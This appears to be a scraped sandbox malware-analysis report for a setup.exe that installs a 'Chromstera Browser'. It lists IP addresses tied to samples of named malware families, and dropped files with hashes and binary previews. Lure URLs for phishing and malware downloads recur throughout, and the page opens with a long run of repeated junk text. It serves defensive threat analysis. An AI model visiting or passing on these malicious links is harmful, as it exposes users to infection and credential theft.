                                                                                                                                                                  https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 4.245.163.56
                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                  (No subject) (93).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 4.245.163.56
                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                  https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 4.245.163.56
                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                  http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 4.245.163.56
                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0edekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  V9fubyadY6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  (No subject) (93).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://1drv.ms/o/c/dfbe417e0dc15e08/Esl_LBLy3yNEou5UFJ-QxnIBMGmncz8uv1GwgEHKevm1cw?e=C2cldFGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                  • 104.21.8.139
                                                                                                                                                                  CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 104.21.8.139

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dllSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      Typora#U5b89#U88c5#U52a9#U624b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dllSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Config.Msi\6bc77e.rbs

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):433801
                                                                                                                                                                            Entropy (8bit):6.622296181456385
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:M3MN9WmHcLz+pjqgAOSMmEfS2im5/VJuRLXDCXObptI/p5vD1U:pN9Wm8LOUMlfS2JIjXfGp5BU
                                                                                                                                                                            MD5:F627D13DF9AB451DE2AFB60FEC79C8B5
                                                                                                                                                                            SHA1:A171DC22DACC297898F010F411067F600CFAEAF8
                                                                                                                                                                            SHA-256:C352B938FE40262B2E66950CA70AD82DC41988A13B97599F01A8DB0AA5EFF6C0
                                                                                                                                                                            SHA-512:AA10A9F037AE9AF0C8310988880962E5EAC0B58D7451575475553B3D9AD8F1CBD85360509DB390BF0C8620637C2C0F87173D34F52BEC5377D39E2CC654495C5C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...@IXOS.@.....@nq\Y.@.....@.....@.....@.....@.....@......&.{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}..Chromstera Browser..Chromnius-Main.msi.@.....@.....@.....@........&.{2BF917DE-5B34-453F-A1C8-08CE02C334FC}.....@.....@.....@.....@.......@.....@.....@.......@......Chromstera Browser......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_RemoveAllTempFilesL...AI_RemoveAllTempFiles.@......@S..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V........................... ..`.rdata....... .

                                                                                                                                                                            C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1204192
                                                                                                                                                                            Entropy (8bit):6.449430745026756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:/XFkJPR8H1NQYAhx2S/RHDml5iOMmN4pL8:/XFkJs12YAhx2S/pml5inmN4pL8
                                                                                                                                                                            MD5:427C459E138B4F33819558D451E8500E
                                                                                                                                                                            SHA1:199EC0199C561D9609A181E069491EC4DC3AB92A
                                                                                                                                                                            SHA-256:423E92B04D0C600B88A18E152CCF4912D174FC4522175199860885533BA447DB
                                                                                                                                                                            SHA-512:46BBBE35C7446267AEAE1049794AA0B64DEBD8FE1CD1AD3BE2999FAC9D6C2DA1554617CC1CA16430F1409B281AD522D1BEF276EF9DB98897D3A2268F039FACF7
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\D..D..D......J...........W....\..........._......E......Q..D.....]...;..].R.E..]...E..RichD..........PE..L..."=.d.........."....$.b...........}............@.......................................@.................................|v.......................0.../..............p...................@.......x...@....................l.. ....................text...Oa.......b.................. ..`.rdata..h............f..............@..@.data...l4...........z..............@....rsrc...............................@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.ini

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):516
                                                                                                                                                                            Entropy (8bit):5.293699088089054
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1OSMctbmwGsYiDSm8HCVLNvtgtjqszNXK3LXWizeYW8U4+3sfc:1E4TYiDVLNYWi8Bqzm+3Yc
                                                                                                                                                                            MD5:EF5B8581D83F4E015AB625D85822A5E2
                                                                                                                                                                            SHA1:2D41A9FC3688629A591C128F3F48A4E786E8C271
                                                                                                                                                                            SHA-256:6DA817E79DF464811593D8DD587F38FE36902EE5C74132384BB5AAA049DB4FE5
                                                                                                                                                                            SHA-512:9809C0503A56612672C4A5B613467D0510E71129AA7361F58A56FD220E40947254FD2AEDDE21BD96D868D4B7B61D8CC562210E113BEC590B6084BBED583F5276
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[General]..Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI..AppDir=C:\Program Files (x86)\Chromstera Browser\..ApplicationName=Chromstera Browser..CompanyName=Chromstera Solutions..ApplicationVersion=1.0.0.0..DefaultCommandLine=/silentall -nofreqcheck..URL1=https://chromsteraupdates.com/download/updates.txt..CheckFrequency=1..DownloadsFolder=C:\ProgramData\Chromstera Solutions\Chromstera Browser\updates\..ID={F82AF5DB-E99C-41D4-AAE0-B8E22E7D0F21}..URL=https://chromsterabrowser.com/download/updates.txt..

                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):1.3277084320389847
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrX:KooCEYhgYEL0In
                                                                                                                                                                            MD5:0E3BC5BE8C22464C1F12188F446148FF
                                                                                                                                                                            SHA1:739A91042848EFA9928911EAC0EB2AA0261C9CF7
                                                                                                                                                                            SHA-256:D12B9CD5A5486402B228F1F16A02B825275BB805F6B8980A764A5EE39BBC8B4E
                                                                                                                                                                            SHA-512:27C6FDB59FB31D6EF10F84E11D08340782C2402C21C47610174A979321DF2FF4B765AB390DCD19F5B71940DD818447518DC2854C151CD6149A2663DE549FA915
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x75276603, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):0.4221795702959578
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                            MD5:1B505D9D3BC3F93C377A118C2BE36891
                                                                                                                                                                            SHA1:1085AB6E7CD5BE9DC883002297385B29D9F4102C
                                                                                                                                                                            SHA-256:10E097FA4CB29FDE03C7AD7772A65C7EB5689EC25C19DCF592919196D86987D7
                                                                                                                                                                            SHA-512:A29817739CC9BEB726F882BFB905CF790E1F55A8064CDACCB3AC28A769B8DF7E8D19DE62417661738E515785CBA811D3DEC8C3F308A1ED077EA4496812EB5773
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:u'f.... .......A.......X\...;...{......................0.!..........{A.;....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{......................................;....|.....................;....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.07689791902081947
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:IyEYepWudajn13a/8nuxllollcVO/lnlZMxZNQl:I5zpWSa53quOAOewk
                                                                                                                                                                            MD5:257179BF8851FA13DF902733E3516D62
                                                                                                                                                                            SHA1:414EC3CCECF232E3AF6B9B79E4DE3A1EF325A07E
                                                                                                                                                                            SHA-256:BD3653DCDD8C0A1BAB85703F00BA209C12795E941FF8293A3A7E6C309E1CECC3
                                                                                                                                                                            SHA-512:8A12B9B6638BD3CC0699B339A9E5D652A953CCAF5058EEE40E373E512FD7C901AE96CBD9A3EA68BA7C6C96D6743595787BE64D5BCD3329B02ED6343F59DD747B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..$......................................;...{..;....|.......{A..............{A......{A..........{A]...................;....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):71954
                                                                                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                            Entropy (8bit):3.1121829603338513
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:kKF/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:liDnLNkPlE99SNxAhUe/3
                                                                                                                                                                            MD5:1A7E003CBAFD58EEBEFF13A869286CCF
                                                                                                                                                                            SHA1:ACC52B68ADD41D3BEDA9523BFEBE81AA3B2753F2
                                                                                                                                                                            SHA-256:4EB34746A6C05E77813250696E5460631B09BF7F059F75B413CFF7416E72EBD1
                                                                                                                                                                            SHA-512:CD5CB5ECE3273F7B3C08900F770D19608128FB4318D0ABB086256AE1F0DB50A3C4DC2991F7D9C650D739A7509C2FB2BB4A18C36A1B86DE0CC6256CF8CF9E52A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:p...... ........rd..d)..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\New

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):2.9169468593135157
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+f+OFx/DgstjfDaf///////aorGbaX8PSccl1q12xfnW1orsKc:+WqDgOQ///////aoZsP+/qAVnWursKc
                                                                                                                                                                            MD5:1E80DE80CEFEE55D7CFDA0DF2EDCF3B2
                                                                                                                                                                            SHA1:6E567D732354BBB21F9A57BBB72730C497F35380
                                                                                                                                                                            SHA-256:4E64F4E40D8CBFF082B37186C831AF4B49E3131C62C00A0CF53E0A6E7E24AC2B
                                                                                                                                                                            SHA-512:5EFEA023B18FFD5B87A19837BA2C72C179B55B7C3071B773A032C63D7268DBE25E2902AE8B111AD83A4F005346B378C7A75033ADAEE90805BCB4FEC2822E54C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\Up

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):2.7901346596966383
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+n5lkX/1//AJffffPTb6ylHJxnSfFN5pM2C:+5lkX/K
                                                                                                                                                                            MD5:FD64F54DB4CBF736A6FC0D7049F5991E
                                                                                                                                                                            SHA1:24D42FB471AAA7BCD54D7CCB36480F5ADD9B31D4
                                                                                                                                                                            SHA-256:C269353D19D50E2688DB102FEF8226CA492DB17133043D7EB5420EE8542D571C
                                                                                                                                                                            SHA-512:EC622AFAB084016F144864967A41D647E813282CB058F0F11E203865C0C175BA182E325A6D5164580FF00757C8475B61DE89CCC8E892E1B030E51B03AD4EAFB4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):211776
                                                                                                                                                                            Entropy (8bit):6.545789465666009
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:APFAhETm5/VCZCuRspcZ2XcIQISCXOtwypRnWmomS7/Br5vEgn/Zr/e:bim5/VJuRLXDCXObptI/p5vD12
                                                                                                                                                                            MD5:6CE8F1D957A3545827ABA750E2087548
                                                                                                                                                                            SHA1:4EF30873A3A4CD2138320A3AECF9C0235F2993A9
                                                                                                                                                                            SHA-256:6DE3B9B00849AB2398B36446B16E7A435CDBF8610B31FFD36E381636DC33E3A8
                                                                                                                                                                            SHA-512:030E400A759B4F4B972D92BFCA8771A90BD87DE8C93B8BAD99B814563D52CC97703A0C21DFAA4D022D2111CCD77F9144D028F2016C66F3429E59589A8B390DB9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.R...<...<...<...?.u.<...9...<..8.n.<..?.l.<...8.i.<..9.K.<...:.~.<...=.n.<...=...<.f.5.g.<.f.<.~.<.f..~.<....~.<.f.>.~.<.Rich..<.................PE..L....=.d.........."!...$.0...........2.......@...............................0............@.................................H...x.......x...............@=......x......p............................E..@............@..........@....................text...]/.......0.................. ..`.rdata.......@.......4..............@..@.data...............................@....rsrc...x...........................@..@.reloc..x........ ..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4502
                                                                                                                                                                            Entropy (8bit):7.593476384016539
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:gf2mCSVa8l5M3QXr1yFk1Erk/Sp3ErJE97KT6Avg+y5rls/Xx:I88oAXQk1Erk/Sp3ErcAvBy/wh
                                                                                                                                                                            MD5:D5A55A78CD38F45256807C7851619B7D
                                                                                                                                                                            SHA1:9D8269120D1D096E9AB0192348F3B8F81F5F73D9
                                                                                                                                                                            SHA-256:BE83C8592906FD9651634B0823A2F45ABE96AAE082674568944C639B5B4A95DC
                                                                                                                                                                            SHA-512:959E7410E3006CFEF9D14315E8741E34B6E81C4F9160C5D66F3ABD77CE72F55F907AB3A0E500780B5C0E0E017E8639F135CC258976B4AB4B9D1AAED6242CE9F1
                                                                                                                                                                            Malicious:false
